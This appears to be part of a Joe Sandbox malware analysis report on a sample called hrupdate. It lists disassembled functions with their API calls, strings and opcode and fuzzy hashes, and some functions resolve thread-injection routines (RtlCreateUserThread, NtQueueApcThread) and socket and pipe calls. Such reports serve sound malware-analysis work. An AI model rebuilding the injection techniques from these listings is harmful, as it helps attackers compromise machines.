                                      Yara matches
                                      Similarity
                                      • API ID: closesocketconnectgethostbynamehtonssocket
                                      • String ID:
                                      • API String ID: 530611402-0
                                      • Opcode ID: 8c3c2bd4798a79f9a0cf09cc9962df59210a1319322d26f080d932f51fe67372
                                      • Instruction ID: ef706c3fab9cc74f9e9666ab50fb212d82ccaaf7a743cbcdd2b67e123c30e2f0
                                      • Opcode Fuzzy Hash: 8c3c2bd4798a79f9a0cf09cc9962df59210a1319322d26f080d932f51fe67372
                                      • Instruction Fuzzy Hash: 17F06D25A10219AAEE107BB48C06FEE77AC9F10728F044655F965AA2D5F7B0F94083E9
                                      Function 046AE93E Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046B1075: __mtinitlocknum.LIBCMT ref: 046B108B
                                        • Part of subcall function 046B1075: __amsg_exit.LIBCMT ref: 046B1097
                                        • Part of subcall function 046B1075: RtlEnterCriticalSection.NTDLL(?), ref: 046B109F
                                      • ___sbh_find_block.LIBCMT ref: 046AE967
                                      • ___sbh_free_block.LIBCMT ref: 046AE976
                                      • HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                      • GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2714421763-0
                                      • Opcode ID: 261b1f6c56f1502dbb40fc6f81c5490ee20d3b3bc17996db55e7cc90c68e683b
                                      • Instruction ID: 24f2442ed42dace21bbc3a1ff21a4e321d9dbfb6fe0e55a2555e0680b6f12814
                                      • Opcode Fuzzy Hash: 261b1f6c56f1502dbb40fc6f81c5490ee20d3b3bc17996db55e7cc90c68e683b
                                      • Instruction Fuzzy Hash: C001A231981B15AAEB30BF70D808BDE3A64DF027A8F10114DE444A6180FE39BC91CF98
                                      Function 0469C6FE Relevance: 7.5, APIs: 5, Instructions: 40sleeppipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469C70B
                                      • GetTickCount.KERNEL32 ref: 0469C712
                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0469C725
                                      • Sleep.KERNEL32(0000000A), ref: 0469C736
                                      • GetTickCount.KERNEL32 ref: 0469C73C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$NamedPeekPipeSleep
                                      • String ID:
                                      • API String ID: 1593283408-0
                                      • Opcode ID: 113f8be80ec3967db2366ba072c34bdcc77bb3b9a41b5a09276811d8da61a5ab
                                      • Instruction ID: 83791948a195717184f838a9f391cd3665304f43676236a3b5b9c6d09a809eff
                                      • Opcode Fuzzy Hash: 113f8be80ec3967db2366ba072c34bdcc77bb3b9a41b5a09276811d8da61a5ab
                                      • Instruction Fuzzy Hash: A5F01272710118BFEF015AA9DC848BE77EEDB46695B140836F601D7501F7B4AD429BA0
                                      Function 046A3BBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 046A3C43
                                      • SetLastError.KERNEL32(00000001), ref: 046A3D6D
                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,04697D15,00000000,00000000,04697D15,00000000,?,0469BDEB,?,00000000,759223A0), ref: 046A3D88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorFileLast_memset
                                      • String ID: /v
                                      • API String ID: 2444439657-2755232556
                                      • Opcode ID: 5d7f1562952fe6a0cf27be315c0925c4f75ea138dded658f9fbeaac41b7cdee4
                                      • Instruction ID: 7c5758cdc519cbc936e83696768cde3ed06ddbab633903af3ceaa5407ed9e334
                                      • Opcode Fuzzy Hash: 5d7f1562952fe6a0cf27be315c0925c4f75ea138dded658f9fbeaac41b7cdee4
                                      • Instruction Fuzzy Hash: B4517D71D01618EBDB21DFA4D841ADEBBB9FB08750F105156E605F7240E734AE94CFA1
                                      Function 04696555 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000008,00000000,00000001), ref: 04696646
                                      • LoadLibraryA.KERNEL32(00000000), ref: 04696651
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 04696659
                                        • Part of subcall function 04696B06: _vswprintf_s.LIBCMT ref: 04696B22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
                                      • String ID: %s!%s
                                      • API String ID: 2092861438-2935588013
                                      • Opcode ID: bde06cd086e9320f8f02fbcd96365bb6f33ec0c2a1bc6e6f62ee81ef2495d9c6
                                      • Instruction ID: ee97cd1fb66f6324134e87b4e450d8d432fc97582637d2cbd45b175a8abacc13
                                      • Opcode Fuzzy Hash: bde06cd086e9320f8f02fbcd96365bb6f33ec0c2a1bc6e6f62ee81ef2495d9c6
                                      • Instruction Fuzzy Hash: 6B41F3B2A042109BEF18CF60C584A6A77FDEB54360F25405ADA02AB385FBB4FC02CB55
                                      Function 046A3540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,046960E2,046DA64C,000002F0,?,00000000,0469632B,?,00000001,?,00000008,00000001), ref: 046A35B0
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_malloc$CurrentProcess
                                      • String ID: 0-v
                                      • API String ID: 2562913181-620404996
                                      • Opcode ID: 881f41b36a4a6e576871e8e1491b60078e213c58b7c0a5cbe2fd437e47505c32
                                      • Instruction ID: 926b85a797b6e23d5b7e9a71c1fd83da27f3e5522f6e61376ac5af2c9d8728c0
                                      • Opcode Fuzzy Hash: 881f41b36a4a6e576871e8e1491b60078e213c58b7c0a5cbe2fd437e47505c32
                                      • Instruction Fuzzy Hash: EB11A971A416096FEF149FA8FC44BA937D9EB09364F105459FA088A781FB79ECA0CE50
                                      Function 046A1A92 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 046A1A9D
                                      • GetCurrentProcess.KERNEL32(04695C1C), ref: 046A1AB7
                                        • Part of subcall function 046A19FA: _memset.LIBCMT ref: 046A1A14
                                        • Part of subcall function 046A19FA: __snprintf.LIBCMT ref: 046A1A73
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$CurrentProcess__snprintf
                                      • String ID: system32$syswow64
                                      • API String ID: 3270679572-3098820961
                                      • Opcode ID: 5e1dff853485e2356264185b788a019488daa93f1e7be2ea17759047c9e107f3
                                      • Instruction ID: 1062d58b7f5d4c72ba1b276587dc09fceb9d6645271fb2f26352ca2e1e956e61
                                      • Opcode Fuzzy Hash: 5e1dff853485e2356264185b788a019488daa93f1e7be2ea17759047c9e107f3
                                      • Instruction Fuzzy Hash: 1DF08231644B047EFB04AB50EC06BF93248EF12719F14415DFA09563C1FEAABD508DAD
                                      Function 0469B6CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,RtlCreateUserThread,?,?,?,0469ADD1,?,00000000,0469AF20,00000000,?,?,0469AF20,00000000,?,00000000), ref: 0469B6E0
                                      • GetProcAddress.KERNEL32(00000000), ref: 0469B6E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: RtlCreateUserThread$ntdll.dll
                                      • API String ID: 1646373207-2935400652
                                      • Opcode ID: 697a8f8fff3f1a1306e6b535903fd3fde5ccde3c7ea36cfafaafdf01725dd7b7
                                      • Instruction ID: c67fbb4ccf0227ec01c8c828d8ec572ac0ab83b7540bb17928e48afb6aeec63f
                                      • Opcode Fuzzy Hash: 697a8f8fff3f1a1306e6b535903fd3fde5ccde3c7ea36cfafaafdf01725dd7b7
                                      • Instruction Fuzzy Hash: 76F0A032901115FBCF00EFE1DC098EE7F69EF01A10B008504F40196100F278AB10DFE0
                                      Function 0469965A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 04699665
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • __snprintf.LIBCMT ref: 04699679
                                      • RemoveDirectoryA.KERNEL32(00000000), ref: 04699688
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateDirectoryHeapRemove__snprintf_malloc
                                      • String ID: %s\%s
                                      • API String ID: 3163426766-4073750446
                                      • Opcode ID: 3ae1250d392db538c0f49c8971b95b5cf29181bc78ac7abeba04d109b085f114
                                      • Instruction ID: c2dfdee13d191998020813252c39efb1fe6b9889249f17ba0744d0794979a676
                                      • Opcode Fuzzy Hash: 3ae1250d392db538c0f49c8971b95b5cf29181bc78ac7abeba04d109b085f114
                                      • Instruction Fuzzy Hash: D8E09A36600614B6EB213A56EC08ABE7B6CDB82665F10402EF90C55200BAB67D619DBA
                                      Function 0469B2EE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,?,0469AEB5,00000000,0469AF20), ref: 0469B2FB
                                      • GetProcAddress.KERNEL32(00000000), ref: 0469B302
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: NtQueueApcThread$ntdll
                                      • API String ID: 1646373207-1374908105
                                      • Opcode ID: 0ece6744af8924afe03171ec23c3bea2764553c5720040d11043c024c119d79a
                                      • Instruction ID: 89ef36bbf1c458f651ef11c45edb5905a152a0db59f85a7b8b6a9c784e0a65aa
                                      • Opcode Fuzzy Hash: 0ece6744af8924afe03171ec23c3bea2764553c5720040d11043c024c119d79a
                                      • Instruction Fuzzy Hash: F8E092363842067BDF212AB5AC06BAA3B9DDF01E25F008519F119D4591F6A1F8105E04
                                      Function 0469897E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,0469CE82), ref: 04698990
                                      • GetProcAddress.KERNEL32(00000000), ref: 04698997
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsWow64Process$kernel32
                                      • API String ID: 1646373207-3789238822
                                      • Opcode ID: 0bde6aa1f94bdee4ff96030f9a5aab6add02c6c79f76553058e2f3ad3934a293
                                      • Instruction ID: 3da05fdd23ae8816d7cfbb3161dc612fa7d0328602b6265e514006e20d854fa9
                                      • Opcode Fuzzy Hash: 0bde6aa1f94bdee4ff96030f9a5aab6add02c6c79f76553058e2f3ad3934a293
                                      • Instruction Fuzzy Hash: 63E0EC7066020ABBDF10DBE6DD0AAAE76ACDB1164DF504198B405E2541FBB8EE009E21
                                      Function 04699A64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,?,046978D7,?), ref: 04699A71
                                      • GetProcAddress.KERNEL32(00000000), ref: 04699A78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32
                                      • API String ID: 1646373207-736604160
                                      • Opcode ID: 5a49498c5a820034bf648ae6e702cbe76eb99ee522eb7596ef60178a8b5023fe
                                      • Instruction ID: 413fcac1d333ef0dd3699f76dd3dd11ff871dd77169f097209fc8aecba676a57
                                      • Opcode Fuzzy Hash: 5a49498c5a820034bf648ae6e702cbe76eb99ee522eb7596ef60178a8b5023fe
                                      • Instruction Fuzzy Hash: C9C08CB034030A7FDF106BE3EC0D9BA7E5CDA62B42B004058B419C1A02FEA9EC008EA0
                                      Function 04699A89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,046978F8,?,00000000,00000002), ref: 04699A96
                                      • GetProcAddress.KERNEL32(00000000), ref: 04699A9D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32
                                      • API String ID: 1646373207-3900151262
                                      • Opcode ID: da7e26dc4257aeb35069b0bd5307274819d59671f4ed958a82dec33a31abcf54
                                      • Instruction ID: ccc38b7597fab84f45df9149371685e78a2869fe73d07e5b649ce33670644092
                                      • Opcode Fuzzy Hash: da7e26dc4257aeb35069b0bd5307274819d59671f4ed958a82dec33a31abcf54
                                      • Instruction Fuzzy Hash: 4BC012B03402057FAF102BE2EC0D96A3E5CD912A513004054B51980503FA6AAC045D50
                                      Function 046992F3 Relevance: 6.1, APIs: 4, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                        • Part of subcall function 046AF48E: __fsopen.LIBCMT ref: 046AF49B
                                      • _fseek.LIBCMT ref: 04699369
                                        • Part of subcall function 046AFAC8: __lock_file.LIBCMT ref: 046AFAD7
                                        • Part of subcall function 046AFAC8: __ftelli64_nolock.LIBCMT ref: 046AFAE4
                                      • _fseek.LIBCMT ref: 04699382
                                        • Part of subcall function 046AFE59: __lock_file.LIBCMT ref: 046AFEA4
                                        • Part of subcall function 046AFE59: __fseek_nolock.LIBCMT ref: 046AFEB4
                                      • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 046993AF
                                      • _malloc.LIBCMT ref: 046993C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
                                      • String ID:
                                      • API String ID: 73014519-0
                                      • Opcode ID: 463790fcb7e1952410b4101f349d9a1c61c8a87c2f6985760faf9e328845c1d5
                                      • Instruction ID: de054e1f6d40ab37cde3639e0806cea2279c3edc7c290ccb7cb8f14424b74ee3
                                      • Opcode Fuzzy Hash: 463790fcb7e1952410b4101f349d9a1c61c8a87c2f6985760faf9e328845c1d5
                                      • Instruction Fuzzy Hash: 264189B2D00208BAEF11AFA4CC81E9E77FCEF44724F10452EE505A2290F6B5AE558B55
                                      Function 046985C1 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3fd0a65c83d115450ce9c2b603e14e9273bcb6974a98c24a2170c73e8f527c5e
                                      • Instruction ID: b00af296f3152853fb29911b4a87c1fc5e3f1ae407c3d79a4ddaeeac4fa3556b
                                      • Opcode Fuzzy Hash: 3fd0a65c83d115450ce9c2b603e14e9273bcb6974a98c24a2170c73e8f527c5e
                                      • Instruction Fuzzy Hash: AE419F72C00109FFEF01BBA4DC409DEBBBDEF05218F14402AE805A7250FB75AE559B99
                                      Function 046AF4A5 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                      Download Yara Rule
                                      APIs
                                      • __flush.LIBCMT ref: 046AF569
                                      • __fileno.LIBCMT ref: 046AF589
                                      • __locking.LIBCMT ref: 046AF590
                                      • __flsbuf.LIBCMT ref: 046AF5BB
                                        • Part of subcall function 046B0E0C: __getptd_noexit.LIBCMT ref: 046B0E0C
                                        • Part of subcall function 046B2DF7: __decode_pointer.LIBCMT ref: 046B2E02
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                      • String ID:
                                      • API String ID: 3240763771-0
                                      • Opcode ID: db026ff494a3457978239db1d965547ff14943b162c60d0616ecb1d5d1b74f91
                                      • Instruction ID: ba02d42d144e7a9ed8d4698a4ebbef6e7bd94d603d8fb21e14532e51323ce76f
                                      • Opcode Fuzzy Hash: db026ff494a3457978239db1d965547ff14943b162c60d0616ecb1d5d1b74f91
                                      • Instruction Fuzzy Hash: 9541A131A00B04ABDB28DF69C88459EB7B6EFA0324B248569D45597240F770FE61CF5A
                                      Function 04695FB0 Relevance: 6.1, APIs: 4, Instructions: 137memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,000002F0,?,00000000,0469632B,?,00000001,?,00000008,00000001), ref: 04696015
                                      • _memset.LIBCMT ref: 0469604A
                                      • HeapFree.KERNEL32(046DA654,00000000,046DA64C,000002F0,?,00000000,0469632B,?,00000001,?,00000008,00000001), ref: 046960F7
                                      • HeapDestroy.KERNEL32(?,00000008,00000001), ref: 04696103
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$DestroyErrorFreeLast_memset
                                      • String ID:
                                      • API String ID: 4224181572-0
                                      • Opcode ID: dfe79da16a346a27ab18ea6140bd23db496c296b4ee7f825088e2d4691623569
                                      • Instruction ID: 3dd23c9b2e9c9e7cf9a355a6d58fd2e44280e7f55bd12d6c6b54d9e946bd7207
                                      • Opcode Fuzzy Hash: dfe79da16a346a27ab18ea6140bd23db496c296b4ee7f825088e2d4691623569
                                      • Instruction Fuzzy Hash: EA410672A04304FFEF306E95ED849BA77ECEB11314F00002EE94186282F6B9BD829B54
                                      Function 04699BE2 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memsethtonl
                                      • String ID:
                                      • API String ID: 4002686732-0
                                      • Opcode ID: d0d0142262ed959312338a7ba46f3b644e141d642c05e48686352c908d0ee922
                                      • Instruction ID: 1837331aa0889d8563175979be93e44545bb6c7b83d870d7d3ad894b2c2a50db
                                      • Opcode Fuzzy Hash: d0d0142262ed959312338a7ba46f3b644e141d642c05e48686352c908d0ee922
                                      • Instruction Fuzzy Hash: B641B7F1E01614DEEF109BA4DC85AAE7BE8EB15714F18442EE508DB341F2B8AD49CB51
                                      Function 04697EEB Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      • htonl.WS2_32(?), ref: 04697FA0
                                      • htonl.WS2_32(?), ref: 04697FAA
                                      • _malloc.LIBCMT ref: 04697FC1
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • _memset.LIBCMT ref: 04698025
                                        • Part of subcall function 046A0F96: __snprintf.LIBCMT ref: 046A1014
                                        • Part of subcall function 046A0F96: __snprintf.LIBCMT ref: 046A1026
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
                                      • String ID:
                                      • API String ID: 1734027086-0
                                      • Opcode ID: 313c5db141e0b786e5b2f4ebea26255004641466c765aaf7824269a2fbcf47a4
                                      • Instruction ID: 4de2c3b45699d16a1dd8d47cec66ebac8880dfa67a97ebcf53e9553f87c17bfd
                                      • Opcode Fuzzy Hash: 313c5db141e0b786e5b2f4ebea26255004641466c765aaf7824269a2fbcf47a4
                                      • Instruction Fuzzy Hash: 5A412B21D04289E9FB11A7F8D804BEFBFE85F12308F04409DD4807B282F6B96E4597B6
                                      Function 04699F1A Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_malloc
                                      • String ID:
                                      • API String ID: 3506388080-0
                                      • Opcode ID: 9cbb831c65a7ccb45ac858326507713e96d3132d127c6e72245562bb4a511a0c
                                      • Instruction ID: d77c880217750b34a5ca8418479edd503e906ac37473ae97204610e8ec3701c0
                                      • Opcode Fuzzy Hash: 9cbb831c65a7ccb45ac858326507713e96d3132d127c6e72245562bb4a511a0c
                                      • Instruction Fuzzy Hash: EF41B271900701EBEF21DF58C880A9AF7E9EF94318F24842DD959A7351F7B1BD048B41
                                      Function 0469BED6 Relevance: 6.1, APIs: 4, Instructions: 117sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0469BEF6
                                      • _memset.LIBCMT ref: 0469BF08
                                        • Part of subcall function 0469D036: htons.WS2_32(?), ref: 0469D04E
                                        • Part of subcall function 0469BE32: GetLastError.KERNEL32(-0000EA60,?,?,04697D15,?,?), ref: 0469BE4D
                                      • Sleep.KERNEL32(000001F4), ref: 0469BFA8
                                      • GetLastError.KERNEL32 ref: 0469BFB4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_memset$Sleephtons
                                      • String ID:
                                      • API String ID: 2264653377-0
                                      • Opcode ID: 581133600f03240e857dad08e67f8d931d653a9d53e888cfe240fa6038e488b6
                                      • Instruction ID: 0357c9448745cc3b0d706dc6f49ee3201110a5d6f558b3b3e3bfaf2b4c0e0356
                                      • Opcode Fuzzy Hash: 581133600f03240e857dad08e67f8d931d653a9d53e888cfe240fa6038e488b6
                                      • Instruction Fuzzy Hash: 0D3170729042096EEF15EBE0EC41EEE77FCEF05754F10006AE644A6180FAB1BE488B65
                                      Function 046A1E17 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • __time64.LIBCMT ref: 046A1E25
                                        • Part of subcall function 046AEC25: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046A1BCD,00000000,00000080,00000000,00000000,?,?,?,046945CD,?,00000000,00000000), ref: 046AEC30
                                        • Part of subcall function 046AEC25: __aulldiv.LIBCMT ref: 046AEC50
                                      • __time64.LIBCMT ref: 046A1E40
                                      • __time64.LIBCMT ref: 046A1ED3
                                      • __time64.LIBCMT ref: 046A1F29
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __time64$Time$FileSystem__aulldiv
                                      • String ID:
                                      • API String ID: 4218076520-0
                                      • Opcode ID: 98f2517918c09d52a25b419c6602dffc8ff61a76687718f2b86298891feb9c4c
                                      • Instruction ID: 4d4a865d2239358ac649744cd2cf182a62705414095c4dae04f49f3ff485ccb1
                                      • Opcode Fuzzy Hash: 98f2517918c09d52a25b419c6602dffc8ff61a76687718f2b86298891feb9c4c
                                      • Instruction Fuzzy Hash: 4A415CB1D05A41DFC314DFA9E1808A9BBF4FB95308B10A16FD426A7290FB39AD95CF04
                                      Function 0469A51F Relevance: 6.1, APIs: 4, Instructions: 108sleeppipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInfoPipeSleepStartup_memset
                                      • String ID:
                                      • API String ID: 112726305-0
